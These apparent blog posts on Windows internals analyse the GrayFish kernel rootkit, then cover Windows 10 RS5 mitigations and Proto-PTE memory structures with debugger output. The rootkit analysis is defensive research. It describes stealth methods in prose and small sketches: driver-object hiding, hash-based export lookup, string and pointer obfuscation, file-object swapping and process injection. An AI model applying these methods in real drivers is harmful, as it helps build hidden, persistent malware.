Earlier in this year, I published research of the rootkit that belong to famous state-sponsored cybergroup called "Equation Group". Analyzed rootkit actually represents one of the Windows kernel mode network implant, which has been used by cybergroup as a network traffic sniffer on NDIS level. As we know from comprehensive research of Kaspersky Lab, Equation Group has an arsenal of various sophisticated malware, such as EQUATIONDRUG, DOUBLEFANTASY, TRIPLEFANTASY, GRAYFISH, etc. This arsenal of malware is pretty complex and sufficient for performing cyberattacks that allegedly have state-sponsored origins (NSA). As we know, not only Equation Group leverages kernel mode rootkits, for example, Sednit (APT28, Fancy Bear, Pawn Storm) and Strider cybergroups also resort to the same.

Unlike other malware families of Equation Group, GRAYFISH has on board Windows kernel rootkit for performing malicious operations in high privileged Ring 0 mode. Moreover, like other state-sponsored rootkits that were mentioned previously in my blog, GrayFish (or Trojan.Win32.GrayFish.b as Kaspersky called it) is pretty interesting for the analysis. As we can see from previous instances of such malware, their authors can choose non standard ways for rootkit development.

Typically, malware from cyberespionage platforms leverages kernel mode rootkits to achieve the following advantages.

A method of hiding files that is independent of the user mode context, for example, with the help of a legacy FS filter (Stuxnet).
A universal method of code injection based on Windows kernel callbacks (Stuxnet, EquationDrug). Also code injection into trusted Windows processes for masking malicious activity (Finfisher, EquationDrug).
Execution of the necessary user mode code directly in kernel mode (Remsec).
Bypassing Windows x64 kernel mode restrictions (DSE) with a bootkit component (Sednit, GrayFish).
Listening to network traffic directly from the physical network adapter (EquationDrug).
Bypassing FS/disk level sandboxes as well as other restrictions imposed on a system by security products (Wingbird).

I found the rootkit file in the resource section of another module (DLL) that is also a part of the GrayFish cyberespionage platform. Below you can see the compilation date of this DLL. The driver is stored in the resource section unencrypted and can be dumped from it with the help of the Resource Hacker tool.

Although the DLL stores the rootkit file, it doesn't load it into memory. I suppose that the driver loader is located in another GrayFish module. However, code inside the library communicates with the driver via the DeviceIoControl API. The rootkit supports various IOCTL codes for performing the necessary operations.

The rootkit has the following properties.

It creates an unnamed device object, but registers IRP dispatch functions.
It dispatches IOCTL requests.
It specializes in run-time patching of Windows kernel code.
It has a huge driver size (153 600 bytes).
It contains an inarticulate logic of work, which suggests that it was developed for one specific goal, but was later modified for another.

The authors of the rootkit chose an interesting way of initializing it. It seems the rootkit file has to be patched before it is loaded into memory, in order to store a special process identifier. When it is time to initialize the DriverObject and perform the other initialization steps, the rootkit code retrieves the process id hardcoded into its body and tries to get the address of the process object with the PsLookupProcessByProcessId API. Once the code has a pointer to the process, it attaches to its address space with KeAttachProcess. Recall that the rootkit's DriverEntry function is executed in the context of the System process address space.

For this reason, if you try to load the rootkit manually, you will either get a BSOD or see no activity at all.

As the first step of initialization, the rootkit builds its own buffer of NT kernel exports and their hashes in the following format: +0 FuncHash; +4 FuncAddr. It contains an internal function for extracting a specific item (function address) from this table by the hash of the function (NT export) name.
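The table layout and the lookup by hash can be modelled in user mode roughly as follows. This is a minimal sketch, not the rootkit's code: the hash algorithm is not given in this post, so `demo_hash` (rotate and XOR) and all other names here are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One table entry: hash of the export name followed by its address.
 * The compiler may pad this on 64-bit builds, so the offsets are illustrative. */
typedef struct {
    uint32_t  func_hash;  /* +0 FuncHash */
    uintptr_t func_addr;  /* +4 FuncAddr */
} export_entry;

/* Hypothetical name hash (rotate left by 7, then XOR); NOT the rootkit's algorithm. */
static uint32_t demo_hash(const char *name)
{
    uint32_t h = 0;
    assert(name != NULL);
    while (*name) {
        h = (h << 7) | (h >> 25);
        h ^= (uint8_t)*name++;
    }
    return h;
}

/* Linear search by hash; returns 0 when the export is not in the table. */
static uintptr_t find_export(const export_entry *table, size_t count, uint32_t hash)
{
    assert(table != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        if (table[i].func_hash == hash)
            return table[i].func_addr;
    }
    return 0;
}
```

Storing only hashes means that no readable export names have to appear next to the table, which is presumably why this format is popular with malware authors.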

The rootkit also retrieves pointers to dynamic imports in the following way. It uses the functions hal!HalAllocateCommonBuffer or nt!MmIsAddressValid for retrieving the start address of hal.dll (HAL) or ntoskrnl (NT). The names of both functions are encrypted in its body and are decrypted on the stack.

Below are the imports that the rootkit tries to get during the initialization phase (hash -> API).

Equation Group is known for its professionalism in cryptography: malware from its cyberespionage platform leverages various crypto methods and algorithms on a scale that we haven't seen before. It looks like their love of encryption covers the kernel mode component too. The rootkit stores sensitive strings in an encrypted state and doesn't decrypt them inside the image loaded in memory; instead, it copies the necessary data onto the stack and decrypts it there. Before exiting the function, it encrypts the string on the stack again.
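The "decrypt on the stack, use, encrypt again" pattern can be illustrated with a small user mode sketch. The cipher used by the rootkit is not described in this post, so the single-byte XOR, the key `DEMO_KEY` and the function names below are assumptions made purely for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DEMO_KEY 0x5Au  /* hypothetical key; the real cipher is not described */

/* XOR is its own inverse, so one routine both encrypts and decrypts. */
static void xor_buffer(unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        buf[i] ^= DEMO_KEY;
}

/*
 * Compares an encrypted name stored in the image with a plaintext candidate.
 * The stored copy is never modified: it is copied to a stack buffer,
 * decrypted there, used, and encrypted again before the function returns.
 */
static int encrypted_name_equals(const unsigned char *enc, size_t len,
                                 const char *candidate)
{
    unsigned char tmp[64];
    int equal;

    assert(enc != NULL && candidate != NULL && len <= sizeof(tmp));
    memcpy(tmp, enc, len);
    xor_buffer(tmp, len);                       /* decrypt on the stack */
    equal = strlen(candidate) == len && memcmp(tmp, candidate, len) == 0;
    xor_buffer(tmp, len);                       /* re-encrypt before leaving */
    return equal;
}
```

The effect is that a memory dump of the loaded image never contains the plaintext string, and the plaintext lives on the stack only for the duration of one call.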

After getting the address of HalAllocateCommonBuffer (or MmIsAddressValid), the rootkit tries to find the start address of hal.dll in order to retrieve the addresses of dynamic imports. It is interesting that the rootkit stores pointers to HAL or NT functions in memory in an encrypted state, as shown above (it XORs the value of each pointer with its offset). The same goes for NT imports: all of them are stored in the rootkit image encrypted.
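A minimal sketch of such pointer obfuscation is shown below. It assumes that "offset" means the byte offset of the slot inside the pointer table; the post does not say whether the real offset is relative to the table or to the image, and the function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stores ptr in slot `index`, XORed with the slot's byte offset in the table. */
static void store_encoded(uintptr_t *table, size_t index, uintptr_t ptr)
{
    assert(table != NULL);
    table[index] = ptr ^ (uintptr_t)(index * sizeof(uintptr_t));
}

/* Recovers the original pointer by applying the same XOR again. */
static uintptr_t load_decoded(const uintptr_t *table, size_t index)
{
    assert(table != NULL);
    return table[index] ^ (uintptr_t)(index * sizeof(uintptr_t));
}
```

Note that with this scheme the slot at offset 0 holds its pointer unchanged, so the protection is only a light obstacle for someone scanning memory for kernel addresses.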

The rootkit uses some sort of code and data obfuscation, although it stores the imports of kernel API in the clear (PE IAT). To mask its activity from researchers' eyes, the rootkit creates a new driver object with the name \Driver\msvss, so after exiting from DriverEntry, the original Windows kernel DriverObject will contain no information about the rootkit's DeviceObject or about its IRP_MJ handlers.

This method of hiding the real DriverObject was used by the Remsec rootkit authors. Part 2 of my Remsec driver research contains information about this technique. The rootkit calls ObCreateObject to create the new DriverObject, ObInsertObject to create a handle and ObMakeTemporaryObject to remove the name of the object from its parent object manager directory \Driver\ (hiding it from researchers' eyes).

Before creating the new DriverObject, the rootkit tries to get a pointer to another specific system driver object. It contains the encrypted names of four drivers listed below. Next, it walks through all driver objects looking for one that has a non-zero DriverSection field and whose DriverObject->MajorFunction[IRP_MJ_CREATE_NAMED_PIPE] handler is located inside the ntoskrnl image.

In my case the rootkit chose \Driver\mountmgr.

During initialization of the new driver object, the rootkit copies some fields from \Driver\mountmgr into the newly created DriverObject. It also copies the value of DriverObject->MajorFunction[IRP_MJ_CREATE_NAMED_PIPE] of MountMgr into the IRP_MJ handlers of the new driver. Later, it overwrites these handlers with a pointer to a single dispatch function.

The next step of the rootkit execution is really interesting. It tries to get a handle (FileObject) to its own device object by calling the IRP_MJ_CREATE handler directly with IoCallDriver. But before doing this, it creates a handle to the reserved system device object \Device\NULL that belongs to the driver \Driver\Null. Then it replaces the DeviceObject field in the Null FileObject with the rootkit's device object and uses this FileObject for sending the IRP_MJ_CREATE request.

Despite the pretty clear logic of driver initialization, the execution logic of the remaining rootkit code is really incomprehensible. For example, the table of ntoskrnl exports created by the rootkit is used in only one case, when the rootkit receives a special IOCTL code.

The following characteristics show the inarticulate logic of the rootkit's work.

As mentioned above, the rootkit builds a table of ntoskrnl exports that stores pointers to functions and hashes of their names. The strange thing is that the rootkit uses this table only once, while dispatching an IOCTL request.
As mentioned above, the rootkit has a function for retrieving an ntoskrnl API by the hash of its name. It also obfuscates the pointers to these functions. Another strange thing is that it uses this method only in specific pieces of code, as if it was written by one person and later ignored by another.
It is unclear how user mode code connects to the rootkit to send IOCTLs, because the rootkit's device object is unnamed.

Conclusion

The GrayFish rootkit looks really strange, from its initialization to its objectives. If we run the rootkit driver on a machine and then scan it with various anti-rootkits, we will see no suspicious activity. This means that by default the rootkit sets no hooks on Windows kernel functions, unlike other rootkits. The rootkit also doesn't register any callback functions, for example, on process creation or module loading.

Unlike other civilian and state-sponsored rootkits, GrayFish doesn't use Windows kernel mode to monitor system activity or to hide files on disk. At the same time it contains code for patching Windows kernel functions. This code can be activated later.

Like other rootkits, GrayFish contains code for code/data injection into processes with the help of ZwOpenProcess/PsLookupProcessByProcessId/KeStackAttachProcess. When the rootkit works with user mode memory during injection, it calls an interesting system function, MmSecureVirtualMemory. It receives all its instructions from the user mode client.

↧

Windows 10 RS5 introduces a new Software PTE type

October 3, 2018, 11:23 am

As we already know, Microsoft tries to roll out new security features (aka exploit mitigations) with each release of Windows 10 (RS_X). Previous releases brought EMET built into the OS (aka Exploit Protection), Controlled Folder Access (Anti-Ransom_Encoder), KPTI, IOMMU devices support, Arbitrary Code Guard (ACG), Spectre-related mitigations, etc. A comprehensive list of such improvements can be found in the document Mitigate threats by using Windows 10 security features and in the presentation by Matt Miller and Dave Weston at BH USA 2016 called Windows 10 Mitigation Improvements.

In this blog post I'll try to describe some new Windows 10 RS5 kernel changes as well as other security features that Microsoft has introduced with this Windows release. Here are some findings: RS5 brings a new type of PTE, improves support for Intel's CET technology, adds a special mitigation to the VMM to harden it against the L1TF vulnerability, and introduces so-called Security Domains into the NT kernel.

L1TF mitigation

L1 Terminal Fault is already a well-known vulnerability related to speculative execution side channel attacks. But unlike the previous Spectre cases, L1TF relies on the fact that speculative execution makes it possible to access data located in a physical page (PFN) that is not actually used by any valid PTE of the VMM. In other words, the CPU speculatively follows an invalid PTE that still points to some PFN while Windows dispatches the #PF exception. More details are in Matt Miller's blog post.

After MS released a security update with the L1TF mitigation, I checked ntoskrnl and found how they fix this vulnerability. As Matt wrote in his blog post, the VMM simply corrupts the PFN field inside an invalid PTE, so if the CPU tries to translate this PTE speculatively, it gets a fake physical address that points beyond the bounds of memory.

As we know from the VMM internals, the Transition PTE is exactly the type that may be used for an L1TF attack. The VMM moves a valid PTE to the Transition state when it becomes useless for the caller process. For example, process commits memory -> process frees memory (the PTE goes from the Valid state to Transition). After the Transition state, the VMM sets it to another state and leaves a note in the PFN database. MS has added MiSwizzleInvalidPte so that the VMM can corrupt the PFN field in a Transition PTE.
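The idea of corrupting the PFN field can be shown with a simplified model. This is not a reconstruction of MiSwizzleInvalidPte: the choice of bit (`SWIZZLE_BIT`) and the function names are assumptions, and the real kernel logic may differ.

```c
#include <assert.h>
#include <stdint.h>

#define PTE_VALID      0x1ull
#define PTE_PFN_SHIFT  12
#define PTE_PFN_MASK   0x0000FFFFFFFFF000ull   /* bits 12..47 */
/* Hypothetical: a PFN bit above any RAM installed in the modelled machine. */
#define SWIZZLE_BIT    (1ull << 44)

/* Make the PFN of an invalid PTE point past the end of physical memory. */
static uint64_t swizzle_invalid_pte(uint64_t pte)
{
    assert((pte & PTE_VALID) == 0);   /* only non-present entries are touched */
    return pte | SWIZZLE_BIT;
}

/* Undo the swizzle when software reads the PFN back. */
static uint64_t unswizzled_pfn(uint64_t pte)
{
    return ((pte & ~SWIZZLE_BIT) & PTE_PFN_MASK) >> PTE_PFN_SHIFT;
}
```

In this model a speculative translation of the swizzled entry would target a physical address of 16 TB and above, where no cacheable memory exists, while the memory manager can still recover the real PFN.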

See ADV180018 | Microsoft Guidance to mitigate L1TF variant.

The new FileInfo classes

Windows 10 RS5 introduces new members of the famous FILE_INFORMATION_CLASS enumeration, which hint that you can get access to more information about files in this new Windows release.

FileLinkInformationEx = 72 /*0x48*/,
FileLinkInformationExBypassAccessCheck = 73 /*0x49*/,
FileStorageReserveIdInformation = 74 /*0x4A*/,
FileCaseSensitiveInformationForceAccessCheck = 75 /*0x4B*/,

The new types of mitigations

Windows 10 RS5 introduces several new mitigation options. You can see them below.

· PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE

· PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY

· PS_MITIGATION_OPTION_CET_SHADOW_STACKS

The first mitigation improves Windows immunity to the Speculative Store Bypass (SSB) vulnerability. The second, I think, is related to Arbitrary Code Guard (ACG). And the third adds support for the Intel CET anti-exploit technology.

Security Domains

RS5 also brings an interesting term that I believe may be relevant to speculative execution side channel (SESC) attacks too. Now an EPROCESS can be linked to a so-called "Security Domain".

New Native API

Ntdll welcomes new API.

MACHINE FRAME

For those who have dealt with the basic concepts of Windows NT or Linux internals, the term "frame" is familiar. It represents the set of registers captured at the moment of an interrupt or exception: the trap frame and the exception frame are well-known instances. Once the frame has been captured, the interrupt manager, exception manager or system service manager can later return the program execution flow to its original (pre-interruption) state using the frame info.

Windows 10 RS5 introduces a new type of frame: the machine frame. It is used by the Processor Control Block (KPRCB) to capture its state when some sort of interruption occurs.

Retpoline

The Retpoline mitigation is well known in the Linux world. It is used to protect apps from Spectre #2 (branch target injection). Windows 10 RS5 says hi to Retpoline too.

Supporting Intel CET mitigation & a new PTE type

RS5 is ready to support the Intel CET technology, which is designed to harden a system against ROP-based attacks more effectively. CET introduces a special type of thread stack, the shadow stack, which is maintained by the silicon itself. The return addresses that are pushed onto the usual stack are duplicated on the shadow stack too. Later the CPU can compare both and detect a potential ROP attack.

"CET defines a second stack (shadow stack) exclusively used for control transfer operations, in addition to the traditional stack used for control transfer and data. When CET is enabled, CALL instruction pushes the return address into a shadow stack in addition to its normal behavior of pushing return address into the normal stack (no changes to traditional stack operation). The return instructions (e.g. RET) pops return address from both shadow and traditional stacks, and only transfers control to popped address if return addresses from both stacks match. There are restrictions to write operations to shadow stack to make it harder for adversary to modify return address on both copies of stack implemented by changes to page tables. Thus limiting shadow stack usage to call and return operations for purpose of storing return address only. The page table protections for shadow stack are also designed to protect integrity of shadow stack by preventing unintended or malicious switching of shadow stack and/or overflow and underflow of shadow stack." @Intel.

As you can see from the screenshot above, Microsoft has added a new PTE type specially for CET. Obviously, such PTEs will describe VM pages with CET shadow stack data.

CET support is deeply integrated into the NT kernel. For example, when a thread dies, its shadow stack is released.
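The CALL/RET behaviour described in the Intel quote can be modelled in a few lines of C. This is only a toy model of the concept: the `cpu_model` type and both functions are hypothetical, and on real hardware the shadow stack lives in specially protected pages rather than in an ordinary array.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STACK_DEPTH 64

typedef struct {
    uintptr_t data[STACK_DEPTH];    /* ordinary stack: writable by the program */
    uintptr_t shadow[STACK_DEPTH];  /* shadow stack: written only by call/ret */
    size_t    top;
} cpu_model;

/* CALL: push the return address onto both stacks. */
static void model_call(cpu_model *cpu, uintptr_t return_addr)
{
    assert(cpu != NULL && cpu->top < STACK_DEPTH);
    cpu->data[cpu->top]   = return_addr;
    cpu->shadow[cpu->top] = return_addr;
    cpu->top++;
}

/* RET: pop both copies; returns 1 if they match, 0 to signal a fault. */
static int model_ret(cpu_model *cpu, uintptr_t *target)
{
    assert(cpu != NULL && target != NULL && cpu->top > 0);
    cpu->top--;
    if (cpu->data[cpu->top] != cpu->shadow[cpu->top])
        return 0;   /* mismatch: real hardware raises a control protection fault */
    *target = cpu->data[cpu->top];
    return 1;
}
```

A ROP chain works by overwriting return addresses on the ordinary stack; in this model such an overwrite changes `data` but not `shadow`, so the next `model_ret` reports a mismatch.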

↧

What is a Proto-PTE and how Windows VMM works with it

October 13, 2018, 8:14 am

A Proto-PTE (Prototype PTE, PPTE) is a basic building block of the Windows VMM (Virtual Memory Manager) with the help of which the OS works with memory-mapped files (or Sections in Native/NT kernel API terms). From what I have learned in discussions with Windows Internals researchers, and from my own experience, the PPTE is the trickiest thing a researcher can face. But, in fact, there is nothing complicated about the PPTE concept if we look at it from the right side. Honestly, it was already eleven years ago that I defended my university coursework named "Inside Windows XP VMM". I have uploaded its Russian edition to the famous KM forum. It was written in SoftICE times, when you could break the Windows kernel execution with Ctrl-X and debug a local system without remote actions. :)

That coursework covered a lot of VMM subsystems, including Hyperspace, PTEs, Session space, WSL, the PFN database, Sections and Cache Internals. But, unfortunately, it was oriented only towards the x86 architecture. Thus, I took my chapters dedicated to PTEs and Sections and adapted them for today's x64 architecture. I started to learn Windows Internals when the 2nd version of the book series was released (Inside Windows 2000). Windows Internals and Rootkits are both still my favorite research directions today, as they were more than ten years ago.

A PPTE (which is actually a kind of Software PTE, SPTE) is a basic building block of the VMM that helps it attach a new view of an already mapped section to a specific process. The SPTE term just means that the OS defines the structure of such an always-Invalid PTE by itself, i. e. the CPU doesn't know anything about this structure. The CPU's task when it encounters such an SPTE (Invalid PTE) is just to interrupt execution of the current thread and pass execution to the NT kernel KiPageFault (KiTrap0E) handler (which formally belongs to the interrupt manager or the VMM).

To understand how Windows works with PPTEs, let's pay attention to the following structures.

Section (nt!_SECTION). The kernel structure that describes a section object.
Segment (nt!_SEGMENT). The core structure of the PPTE architecture, which contains the PPTE page table.
Segment Control Area (SCA, nt!_CONTROL_AREA). Along with SEGMENT, it is a key structure of a Section and for understanding how PPTEs work. The control area stores information that helps the VMM perform I/O operations to read data from the file or to write data into it.
Subsection (nt!_SUBSECTION). A data structure that contains the information necessary for calculating an offset inside the mapped file via PPTEs.

Let's talk about each of them in more detail.

As we can see from the picture above, clients (threads) from separate processes can create sections for one specific file in order to execute it. For example, all Windows processes use the kernel32.dll library, which is mapped as a section in every process. The basic SECTION structure represents a kernel object that is created when a thread tries to create a memory-mapped file. If a section is created for a file for the first time, the OS has to initialize the related kernel structures, such as SEGMENT and CONTROL_AREA, that describe the memory-mapped file, including the PPTE table. On the other hand, if a thread tries to create a section for a file that already has the corresponding VMM structures, the newly created section is simply attached to the existing SEGMENT. When a client calls the Windows API to map some range of the file into memory, the VMM takes the PTEs that correspond to the allocated VM and attaches them to the PPTEs; such an SPTE is then called a PTE Pointed to Prototype (PTEPP).

Let's look at major fields of the section structure.

typedef struct _SECTION
{
    struct _RTL_BALANCED_NODE SectionNode;
    UINT64 StartingVpn; //starting virtual page number of mapping
    UINT64 EndingVpn; //ending virtual page number
    union
    {
        struct _CONTROL_AREA* ControlArea; //ptr to corresponding control area
        struct _FILE_OBJECT* FileObject; //or to file object
        struct
        {
            UINT64 RemoteImageFileObject : 1; //for remote files cases
            UINT64 RemoteDataFileObject : 1;
        };
    }u1;
    UINT64 SizeOfSection; //size of section
    union
    {
        ULONG32 LongFlags;
        struct _MMSECTION_FLAGS Flags; //flags from ZwCreateSection
    }u;
    struct
    {
        ULONG32 InitialPageProtection : 12;
        ULONG32 SessionId : 19;
        ULONG32 NoValidationNeeded : 1;
    };
}SECTION, *PSECTION;

Below you can see the format of the control area (CA) structure.

typedef struct _CONTROL_AREA
{
    struct _SEGMENT* Segment; //ptr to corresponding segment
    union
    {
        struct _LIST_ENTRY ListHead;
        VOID* AweContext;
    };
    UINT64 NumberOfSectionReferences;
    UINT64 NumberOfPfnReferences;
    UINT64 NumberOfMappedViews; //count of sections that have been mapped with this CA
    UINT64 NumberOfUserReferences;
    ...
    union
    {
        struct
        {
            union
            {
                ULONG32 NumberOfSystemCacheViews;
                ULONG32 ImageRelocationStartBit;
            };
            union
            {
                LONG32 WritableUserReferences;
                struct
                {
                    ULONG32 ImageRelocationSizeIn64k : 16;
                    ULONG32 LargePage : 1;
                    ULONG32 AweSection : 1;
                    ULONG32 SystemImage : 1;
                    ULONG32 StrongCode : 2;
                    ULONG32 CantMove : 1;
                    ULONG32 BitMap : 2;
                    ULONG32 ImageActive : 1;
                    ULONG32 ImageBaseOkToReuse : 1;
                };
            };
            union
            {
                ULONG32 FlushInProgressCount;
                ULONG32 NumberOfSubsections;
                struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;
            };
        }e2;
    }u2;
    ...
}CONTROL_AREA, *PCONTROL_AREA; //defines section's properties that are actual for all clients

When a client requests an unmap view of section operation, Windows just removes the links to the corresponding PPTE entries from the process's PTEs that describe the view of the mapped section. Thus, the PPTE is a convenient and universal interface for attaching a view to and detaching it from a specific process address space. And this is its major purpose. The Segment structure contains a pointer to the PPTE table, as we can see below.

typedef struct _SEGMENT
{
    struct _CONTROL_AREA* ControlArea; //-> ptr to corresponding CA
    ULONG32 TotalNumberOfPtes;
    struct _SEGMENT_FLAGS SegmentFlags;
    UINT64 NumberOfCommittedPages;
    UINT64 SizeOfSegment;
    ...
    struct _MMPTE* PrototypePte; //-> PPTE table whose entries point to Subsections
}SEGMENT, *PSEGMENT;

Another key structure for understanding how Windows uses PPTEs to work with a Section (memory-mapped file) is the so-called Subsection (nt!_SUBSECTION). A subsection is a data structure that contains the information necessary for calculating an offset inside the mapped file via the PPTEs that describe this file. For a usual binary file there is always (with some exceptions) a single subsection, but for an executable PE file there is one subsection for each PE section plus one more for the PE header. A subsection also stores the memory protection constant for all PTEs that cover a specific PE file section, i. e. the VMM assigns the memory protection constant from the Subsection structure to all PTEs that the Subsection points to.

Every PPTE references a specific subsection: when a section is mapped as binary, all PPTEs point to the single subsection; when a section is mapped as an executable, each PPTE points to the subsection of its PE section. A subsection contains a so-called starting sector field that describes the beginning of the specific section inside the PE file (the value is taken from the PE header: Raw Section Offset / SECTOR_SIZE). A subsection also contains a pointer to its first PPTE in the PPTE table of the Segment and the total number of its PPTEs (i. e. the number of pages for the specific PE section, which is in fact its VirtualSize rounded up to a multiple of PAGE_SIZE).

If we have the address of a PPTE, we can easily calculate the offset inside the PE file that this PTE describes (as the distance between the base and the current PTE). If Pte is a pointer to the current PPTE, then we can calculate the file offset as follows.

((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / sizeof(MMPTE)) << PAGE_SHIFT) + Subsection->StartingSector * SECTOR_SIZE

If Subsection is the address of a subsection, then its first PPTE is FirstPte = &Subsection->SubsectionBase[0], and the end of its range is LastPte = &Subsection->SubsectionBase[Subsection->PtesInSubsection]. I. e. if X is an address inside the section in memory and Pte is its PPTE, then &Subsection->SubsectionBase[0] <= Pte < &Subsection->SubsectionBase[Subsection->PtesInSubsection].
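The offset calculation and the range check can be written as a small self-contained C function. This is a sketch that works on plain integers instead of the real kernel structures; the function and parameter names are hypothetical. Note the explicit parentheses around the shift: in C the `+` operator binds tighter than `<<`, so without them the expression would shift by the wrong amount.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT   12
#define SECTOR_SIZE  0x200u

/*
 * pte_addr        - address of the prototype PTE
 * subsection_base - Subsection->SubsectionBase (address of its first PPTE)
 * ptes_in_subsect - Subsection->PtesInSubsection
 * starting_sector - Subsection->StartingSector
 * pte_size        - size of one PTE: 4 on non-PAE x86, 8 on x64
 */
static uint64_t ppte_to_file_offset(uint64_t pte_addr, uint64_t subsection_base,
                                    uint32_t ptes_in_subsect,
                                    uint32_t starting_sector, uint32_t pte_size)
{
    uint64_t index;

    assert(pte_size == 4 || pte_size == 8);
    assert(pte_addr >= subsection_base);
    index = (pte_addr - subsection_base) / pte_size;
    assert(index < ptes_in_subsect);     /* PPTE must belong to this subsection */

    return (index << PAGE_SHIFT) + (uint64_t)starting_sector * SECTOR_SIZE;
}
```

For example, with 4-byte PTEs, a PPTE located 0x200 bytes past SubsectionBase in a subsection that starts at sector 0 maps to file offset 0x80000.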

typedef struct _SUBSECTION
{
struct _CONTROL_AREA* ControlArea;
struct _MMPTE* SubsectionBase;
struct _SUBSECTION* NextSubsection;
...
union
{
      ULONG32 LongFlags;
      struct _MMSUBSECTION_FLAGS SubsectionFlags;
}u;
ULONG32 StartingSector;
ULONG32 NumberOfFullSectors;
ULONG32 PtesInSubsection;
...
}SUBSECTION, *PSUBSECTION;

typedef struct _MMSUBSECTION_FLAGS
{
struct
{
      UINT16 SubsectionAccessed : 1;
      UINT16 Protection : 5;
      UINT16 StartingSector : 10;
};
struct
{
      UINT16 SubsectionStatic : 1;
      UINT16 GlobalMemory : 1;
      UINT16 Spare : 1;
      UINT16 OnDereferenceList : 1;
      UINT16 SectorEndOffset : 12;
};
}MMSUBSECTION_FLAGS, *PMMSUBSECTION_FLAGS;

Let's take a real example.

> !process 0 0

PROCESS ffffca0cabb485c0

SessionId: 0 Cid: 07d0 Peb: ef0697b000 ParentCid: 0338

DirBase: 13692000 ObjectTable: ffffb981ce2b7380 HandleCount: 149.

Image: VSSVC.exe

> !handle 0 3 ffffca0cabb485c0

0030: Object: ffffb981c8277a50 GrantedAccess: 00000003 (Inherit) Entry: ffffb981ce3c70c0

Object: ffffb981c8277a50 Type: (ffffca0ca8c71c50) Directory

ObjectHeader: ffffb981c8277a20 (new version)

HandleCount: 43 PointerCount: 1407269

Directory Object: ffffb981c7c16b20 Name: KnownDlls

Hash Address Type Name

---- ------- ---- ----

00 ffffb981c8287c10 Section kernel32.dll

> !object ffffb981c8287c10

Object: ffffb981c8287c10 Type: (ffffca0ca8d0ada0) Section

ObjectHeader: ffffb981c8287be0 (new version)

HandleCount: 0 PointerCount: 1

Directory Object: ffffb981c8277a50 Name: kernel32.dll

> dt _SECTION ffffb981c8287c10 -r1

nt!_SECTION

+0x000 SectionNode : _RTL_BALANCED_NODE

...

+0x018 StartingVpn : 0

+0x020 EndingVpn : 0

+0x028 u1 : <unnamed-tag>

+0x000 ControlArea : 0xffffca0c`aa900880 _CONTROL_AREA

+0x000 FileObject : 0xffffca0c`aa900880 _FILE_OBJECT

+0x000 RemoteImageFileObject : 0y0

+0x000 RemoteDataFileObject : 0y0

+0x030 SizeOfSection : 0xae000

...

> !ca 0xffffca0c`aa900880

ControlArea @ ffffca0caa900880

Segment ffffb981c8297cb0 Flink ffffca0cabb4d230 Blink ffffca0caab19e00

Section Ref 1 Pfn Ref 6f Mapped Views 2a

User Ref 2b WaitForDel 0 Flush Count a88

File Object ffffca0caa900c90 ModWriteCount 0 System Views 348f

WritableRefs c0000b

Flags (a0) Image File

\Windows\System32\kernel32.dll

Segment @ ffffb981c8297cb0

ControlArea ffffca0caa900880 BasedAddress 00007ffbcb640000

Total Ptes ae

Segment Size ae000 Committed 0

Image Commit 2 Image Info ffffb981c8297cf8

ProtoPtes ffffb981c7f24a90

Flags (c4820000) ProtectionMask

> dq ffffb981c7f24a90

ffffb981`c7f24a90 8a000000`37295121 00000000`2c624860

ffffb981`c7f24aa0 0a000000`2c625121 0a000000`2c626121

ffffb981`c7f24ab0 0a000000`2c627121 0a000000`2c628121 -> Subsection address
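The valid entries in this dump can be decoded with a few bit operations. The sketch below assumes the usual x64 hardware PTE layout as I understand it (bit 0 is Valid, bits 12..47 hold the page frame number, bit 63 is NoExecute); the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Bit 0: the entry is valid (present) and is interpreted by the CPU. */
static int pte_is_valid(uint64_t pte)
{
    return (int)(pte & 1u);
}

/* Bits 12..47: page frame number; only decoded here for valid entries. */
static uint64_t pte_pfn(uint64_t pte)
{
    assert(pte_is_valid(pte));
    return (pte >> 12) & 0xFFFFFFFFFull;
}

/* Bit 63: NoExecute. */
static int pte_is_no_execute(uint64_t pte)
{
    return (int)(pte >> 63);
}
```

Applied to the first entry, 8a000000`37295121, this gives a valid, non-executable page with PFN 0x37295, which fits the first page of an image (the PE header). The second entry, 00000000`2c624860, has bit 0 clear, so it is a software PTE and is not interpreted by the CPU.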

We can also take a real example from my coursework for 32-bit Windows XP SP3. Let's take a specific cache slot, because creation of a PPTE may be delayed in a Ring 3 process until someone accesses it. Print the list of slots. For example, on my machine the following items exist. In this case, the cache manager has mapped the binary system registry file named NTUSER.DAT. As this file is mapped as binary, only one subsection will exist for it.

Vacb #186 0x81936170 -> 0xc7080000

File: 0x81749818

Offset: 0x00080000

\Documents and Settings\Art\NTUSER.DAT

We can see that this slot maps the file at offset 0x80000 to base address 0xc7080000.

0: kd> !pte 0xc7080000

VA c7080000

PDE at C0300C70 PTE at C031C200

contains 01CF0963 contains 0554A921

pfn 1cf0 -G-DA--KWEV pfn 554a -G--A--KREV

The PTE is valid, so we can restore the content of the PPTE from the PFN database.

0: kd> !pfn 554a

PFN 0000554A at address 8107FEF0

flink 000018C8 blink / share count 00000001 pteaddress E15B7208

reference count 0001 Cached color 0

restore pte 86D204CE containing page 00496E Active P

Shared

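Now we know that the PPTE address is 0xE15B7208 and its original content is 0x86D204CE. We can translate it to a subsection address with the formula.

SubsectionAddress = MmNonPagedPoolStart + (PrototypeIndex << 3).

86D204CE = 1 00001101101001000000 1 00110 0111 0

bit 31 (1) -> is mapped file
bits 30..11 (00001101101001000000) -> high 20 bits of PrototypeIndex
bit 10 (1) -> is ptr to subsection
bits 9..5 (00110) -> protection
bits 4..1 (0111) -> low 4 bits of PrototypeIndex
bit 0 (0) -> PTE is not valid

PrototypeIndex = 000011011010010000000111 = DA407

DA407 * 8 + 81181000 = 6D2038 + 81181000 = 81853038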
